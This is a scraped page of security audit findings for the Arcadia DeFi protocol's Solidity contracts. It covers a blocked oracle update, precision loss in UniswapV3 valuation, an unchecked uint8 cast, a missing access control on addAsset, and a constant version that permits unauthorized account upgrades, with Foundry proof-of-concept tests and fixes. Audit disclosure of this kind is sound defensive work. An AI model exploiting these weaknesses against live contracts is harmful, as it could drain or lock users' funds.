Implement a validation check to revert if the price received from the oracle is beyond the predefined bounds.

Duplicate of #34

n1punp - `Registry.setSequencerUptimeOracle` may be blocked if Chainlink changes the sequencer uptime oracle address , either having a new implementation for the aggregator proxy or simply re-deploys.

n1punp

high

Registry.setSequencerUptimeOracle may be blocked if Chainlink changes the sequencer uptime oracle address , either having a new implementation for the aggregator proxy or simply re-deploys.

Summary

Registry.setSequencerUptimeOracle may be blocked if Chainlink changes the sequencer uptime oracle address , either having a new implementation for the aggregator proxy or simply re-deploys. --> breaking the uptime feed's correctness in the Registry.

Vulnerability Detail

The Registry's setSequencerUptimeOracle function tries to set a new sequencer uptime oracle. However, it requires the old oracle to revert. Now, consider the following scenario:

  • Chainlink deprecates the old uptime oracle (simply stop feeding), and migrates the feed to a new address.

This means the old oracle will simply keep the latestRound data readable, since it is a view function. So, the old oracle will simply not revert. This then means that the setSequencerUptimeOracle will fail since the old oracle does not revert, blocking the address update. So, the Registry will keep consuming the non-updated value, which may report incorrect results in case something happens to the sequencer.

Impact

The Registry will not be able to change the uptime oracle address to a new address as desired in such scenario -- consuming non-updated data, which can be incorrect.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Registry.sol#L186-L187

Tool used

Manual Review

Recommendation

  • Remove the old sequencer revert requirement.

zzykxx - Precision loss in the valuation of UniswapV3 positions might lead to premature liquidations

zzykxx

high

Precision loss in the valuation of UniswapV3 positions might lead to premature liquidations

Summary

A precision loss in the valuation of UniswapV3 positions might lead to premature liquidations causing unexpected loss to the user.

Vulnerability Detail

The function _getPrincipalAmounts() in UniswapV3AM calculates the underlying token amounts of a UniswapV3 liquidity position.
Internally it calls the function _getSqrtPriceX96() which is responsible for calculating the square root of the relative price of two tokens with 96 bits of precision:

function _getSqrtPriceX96(uint256 priceToken0, uint256 priceToken1) internal pure returns (uint160 sqrtPriceX96) {
    ...
    uint256 priceXd18 = priceToken0.mulDivDown(1e18, priceToken1); 
    uint256 sqrtPriceXd9 = FixedPointMathLib.sqrt(priceXd18);
    sqrtPriceX96 = uint160((sqrtPriceXd9 << FixedPoint96.RESOLUTION) / 1e9);
}

The vulnerability lies in the calculation of priceXd18 which is not done with enough precision. If priceToken1 is bigger than priceToken0 * 1e18, priceXd18 will be set to 0. The implication is that sqrtPriceX96 will also be 0, which will result in _getPrincipalAmounts() believing the whole liquidity position is constituted of token0 and the protocol evaluating the position incorrectly.

Let's suppose we have a UniswapV3 position of two tokens:

  • token0: SHIB, Value: ~$0.000009, Decimals: 18
  • token1: WBTC, Value: ~$40.000, Decimals: 8

The protocol evaluates all token prices for 1e18 units of token:

  • priceToken0: ((0.000009*1e18)*1e18)/1e18 = 9e12
  • priceToken1: ((40000*1e18) * 1e18)/1e8 = 4e32
  • priceXd18: (9e12 * 1e18)/4e32 = 0
  • sqrtPriceX96: 0

The 0 value will be then passed to getAmountsForLiquidity() as sqrtRatioX96 which will evaluate the position as if it only contains token0 (SHIB) tokens:

if (sqrtRatioX96 <= sqrtRatioAX96) {
    amount0 = getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, liquidity);
}

Because of this some uniswapV3 positions of tokens with a big discrepancy in price and decimals will be evaluated incorrectly. This can happen while the position is already deposited because of price fluctuations.

POC

Here's a runnable POC that can be copy-pasted in GetUnderlyingAssetsAmounts.fuzz.t.sol. It shows that with a token0 with 18 decimals valued $1 and a token1 with 2 decimals valued $1000 dollars there is a precision loss that results in sqrtRatioX96 being 0:

function test_UniV3SqrtPrecisionLoss() public {
    UnderlyingAssetState memory asset0 = UnderlyingAssetState({decimals: 18, usdValue: 1}); //A token with 18 decimals valued 1$
    UnderlyingAssetState memory asset1 = UnderlyingAssetState({decimals: 2, usdValue: 1000}); //A token with 2 decimals valued 1000$

    uint96 tokenId = 197964524549228351;

    ERC20Mock token1 = new ERC20Mock("Token 1", "TOK1", uint8(asset1.decimals));
    ERC20Mock token0 = new ERC20Mock("Token 0", "TOK0", uint8(asset0.decimals));

    if (token0 > token1) {
        (token0, token1) = (token1, token0);
        (asset0, asset1) = (asset1, asset0);
    }
    NonfungiblePositionManagerMock.Position memory position = NonfungiblePositionManagerMock.Position({
        nonce: 0,
        operator: address(0),
        poolId: 1,
        tickLower: -887272,
        tickUpper: 887272,
        liquidity: 1e18,
        feeGrowthInside0LastX128: 0,
        feeGrowthInside1LastX128: 0,
        tokensOwed0: 0,
        tokensOwed1: 0
    });

    addUnderlyingTokenToArcadia(address(token0), int256(asset0.usdValue));
    addUnderlyingTokenToArcadia(address(token1), int256(asset1.usdValue));
    IUniswapV3PoolExtension pool = createPool(token0, token1, 1e18, 300);
    nonfungiblePositionManagerMock.setPosition(address(pool), tokenId, position);

    uint256[] memory underlyingAssetsAmounts;
    AssetValueAndRiskFactors[] memory rateUnderlyingAssetsToUsd;
    {
        bytes32 assetKey = bytes32(abi.encodePacked(tokenId, address(nonfungiblePositionManagerMock)));
        (underlyingAssetsAmounts, rateUnderlyingAssetsToUsd) =
            uniV3AssetModule.getUnderlyingAssetsAmounts(address(creditorUsd), assetKey, 1, new bytes32[](0));
    }

    uint256 expectedRateUnderlyingAssetsToUsd0 = asset0.usdValue * 10 ** (36 - asset0.decimals);
    uint256 expectedRateUnderlyingAssetsToUsd1 = asset1.usdValue * 10 ** (36 - asset1.decimals);
    assertEq(rateUnderlyingAssetsToUsd[0].assetValue, expectedRateUnderlyingAssetsToUsd0);
    assertEq(rateUnderlyingAssetsToUsd[1].assetValue, expectedRateUnderlyingAssetsToUsd1);

    uint160 sqrtPriceX96 =
        uniV3AssetModule.getSqrtPriceX96(expectedRateUnderlyingAssetsToUsd0, expectedRateUnderlyingAssetsToUsd1);

    //❌ sqrtPriceX96 is equal to zero because of precision loss
    assertEq(sqrtPriceX96, 0); 

    (uint256 expectedUnderlyingAssetsAmount0, uint256 expectedUnderlyingAssetsAmount1) = LiquidityAmounts
        .getAmountsForLiquidity(
        sqrtPriceX96,
        TickMath.getSqrtRatioAtTick(position.tickLower),
        TickMath.getSqrtRatioAtTick(position.tickUpper),
        position.liquidity
    );

    //❌ The position is considered to be constitued only by `token0` 
    assertGt(expectedUnderlyingAssetsAmount0, 0); 
    assertEq(expectedUnderlyingAssetsAmount1, 0);
}

Impact

UniswapV3 positions are evaluated incorrectly, which might lead to premature liquidations (ie. unexpected loss of funds for the user).

Code Snippet

Tool used

Manual Review

Recommendation

This is a "division before multiplication" issue: the function first divides by priceToken1 and then multiplies by 2**96 (sqrtPriceXd9 << FixedPoint96.RESOLUTION). Multiply by 2^96 before diving by priceToken1 while taking care of possible overflows and adjusting the decimals after the square root by multiplying for 2^48.

0xVolodya - No more than 256 tranches to a single lending pool

0xVolodya

medium

No more than 256 tranches to a single lending pool

Summary

According to docs Invariants - LendingPool

No more than 256 tranches to a single lending pool.

Vulnerability Detail

There is no restriction to that in the code or maybe due to silent cast uint8

    function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
        if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
        if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

        totalInterestWeight += interestWeight_;
        interestWeightTranches.push(interestWeight_);
        interestWeight[tranche] = interestWeight_;

        uint8 trancheIndex = uint8(tranches.length);
        tranches.push(tranche);
        isTranche[tranche] = true;

        emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
    }

LendingPool.sol#L216

Impact

Code Snippet

POC - insert in AddTranche.fuzz.t.sol

    function testFuzz_Success_add_300_tranche(uint16 interestWeight) public {
        vm.startPrank(users.creatorAddress);
        for (uint16 i; i < 300; i++) {
            tranche = new TrancheExtension(address(pool), 111, "Tranche", "T");
            pool_.addTranche(address(tranche), i + 1);
        }

        assertTrue(pool_.numberOfTranches() < 256);
    }

Tool used

Manual Review

Recommendation

    function addTranche(address tranche, uint16 interestWeight_) external onlyOwner processInterests {
        if (auctionsInProgress > 0) revert LendingPoolErrors.AuctionOngoing();
        if (isTranche[tranche]) revert LendingPoolErrors.TrancheAlreadyExists();

        totalInterestWeight += interestWeight_;
        interestWeightTranches.push(interestWeight_);
        interestWeight[tranche] = interestWeight_;

-        uint8 trancheIndex = uint8(tranches.length);
+        uint8 trancheIndex = SafeCastLib.safeCastTo8(tranches.length);
        tranches.push(tranche);
        isTranche[tranche] = true;

        emit InterestWeightTrancheUpdated(tranche, trancheIndex, interestWeight_);
    }

0xrice.cooker - addAsset() can be called by anyone in StakedStargateAM and StargateAM contract

0xrice.cooker

high

addAsset() can be called by anyone in StakedStargateAM and StargateAM contract

Summary

addAsset() can be called by anyone in StakedStargateAM and StargateAM contract

Vulnerability Detail

Pretty straight forward, addAsset() can be called by anyone in StakedStargateAM and StargateAM contract.

In the code comment:

No end-user should directly interact with the Stargate Asset Module, only the Registry, the contract owner or via the actionHandler

Impact

Malicious user can add pool which can cause unexpected behaviour

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L62C1-L71C6
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/accounts-v2/src/asset-modules/Stargate-Finance/StargateAM.sol#L62C1-L77C6

Tool used

Manual Review

Recommendation

Put onlyOwner modifier in those function

Duplicate of #62

jesjupyer - `ACCOUNT_VERSION` is always 1, which could lead to unauthorized upgrade

jesjupyer

high

ACCOUNT_VERSION is always 1, which could lead to unauthorized upgrade

Summary

The ACCOUNT_VERSION variable defined in the AccountV1 contract is constant and is kept as 1. Every time the function AccountV1::upgradeAccount is called, the ACCOUNT_VERSION is used as oldVersion and the version information of the AccountV1 is not changed. This causes the confusion that the account has upgraded to newVersion but remains to ACCOUNT_VERSION. Also, since ACCOUNT_VERSION is also queried by Factory::upgradeAccountVersion, the currentVersion will always be 1 and canUpgrade check will also be affected, leading to an unauthorized upgrade.

Vulnerability Detail

Consider the contract AccountV1, the ACCOUNT_VERSION is defined as constant 1.

    uint256 public constant ACCOUNT_VERSION = 1; 

So, in the function AccountV1::upgradeAccount, the oldVersion is wrong regarded as ACCOUNT_VERSION which is 1, and input newVersion is nowhere updated in the contract.

        uint256 oldVersion = ACCOUNT_VERSION;

        // Store new parameters.
        _getAddressSlot(IMPLEMENTATION_SLOT).value = newImplementation;
        registry = newRegistry;

        // Prevent that Account is upgraded to a new version where the Numeraire can't be priced.
        if (newRegistry != oldRegistry && !IRegistry(newRegistry).inRegistry(numeraire)) {
            revert AccountErrors.InvalidRegistry();
        }

        // If a Creditor is set, new version should be compatible.
        if (creditor != address(0)) {
            (bool success,,,) = ICreditor(creditor).openMarginAccount(newVersion); // @follow-up previous account?
            if (!success) revert AccountErrors.InvalidAccountVersion();
        }

        // Hook on the new logic to finalize upgrade.
        // Used to eg. Remove exposure from old Registry and add exposure to the new Registry.
        // Extra data can be added by the Factory for complex instructions.
        this.upgradeHook(oldImplementation, oldRegistry, oldVersion, data);

As a result, even if the account has been upgraded, its ACCOUNT_VERSION will remain to return version 1 which is incorrect.

Since the function AccountV1::ACCOUNT_VERSION() is queried by Factory::upgradeAccountVersion as currentVersion and later proved via MerkleProofLib.verify, this could lead to unauthorized upgrade.

        uint256 currentVersion = IAccount(account).ACCOUNT_VERSION();
        bool canUpgrade =
            MerkleProofLib.verify(proofs, versionRoot, keccak256(abi.encodePacked(currentVersion, version)));

        if (!canUpgrade) revert FactoryErrors.InvalidUpgrade();

Consider the following scenario:

  1. Currently, the wallet has v1, v2 and v3.
  2. Only upgrade from v1 to v3, v1 to v2 is allowed, and the versionRoot is set via setNewAccountInfo.
  3. A user has upgraded to v2. Even though v2 to v3 is not supported, the user could still use the proof of v1-v3 upgrade, and bypass the MerkleProofLib.verify since ACCOUNT_VERSION is always 1 and only (1,3) version pair is examined and verified. This could lead to unauthorized upgrades which will cause potential fund loss/stuck or failure for users.

Impact

The ACCOUNT_VERSION variable defined in AccountV1 contract is constant and is kept as 1. This confuses when the account has upgraded to newVersion but remains to be ACCOUNT_VERSION. Also, since the function AccountV1::ACCOUNT_VERSION() is queried by Factory::upgradeAccountVersion as currentVersion and later proved via MerkleProofLib.verify, this could lead to unauthorized upgrade.

Code Snippet

AccountV1::ACCOUNT_VERSION

    uint256 public constant ACCOUNT_VERSION = 1; 

AccountV1::upgradeAccount

        uint256 oldVersion = ACCOUNT_VERSION;

        // Store new parameters.
        _getAddressSlot(IMPLEMENTATION_SLOT).value = newImplementation;
        registry = newRegistry;

        // Prevent that Account is upgraded to a new version where the Numeraire can't be priced.
        if (newRegistry != oldRegistry && !IRegistry(newRegistry).inRegistry(numeraire)) {
            revert AccountErrors.InvalidRegistry();
        }

        // If a Creditor is set, new version should be compatible.
        if (creditor != address(0)) {
            (bool success,,,) = ICreditor(creditor).openMarginAccount(newVersion); // @follow-up previous account?
            if (!success) revert AccountErrors.InvalidAccountVersion();
        }

        // Hook on the new logic to finalize upgrade.
        // Used to eg. Remove exposure from old Registry and add exposure to the new Registry.
        // Extra data can be added by the Factory for complex instructions.
        this.upgradeHook(oldImplementation, oldRegistry, oldVersion, data);

Factory::upgradeAccountVersion

        uint256 currentVersion = IAccount(account).ACCOUNT_VERSION();
        bool canUpgrade =
            MerkleProofLib.verify(proofs, versionRoot, keccak256(abi.encodePacked(currentVersion, version)));

        if (!canUpgrade) revert FactoryErrors.InvalidUpgrade();

Tool used

Manual Review, VSCode

Recommendation

Don't define ACCOUNT_VERSION as constant, move it to AccountStorageV1 and let it vary with each upgrade.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.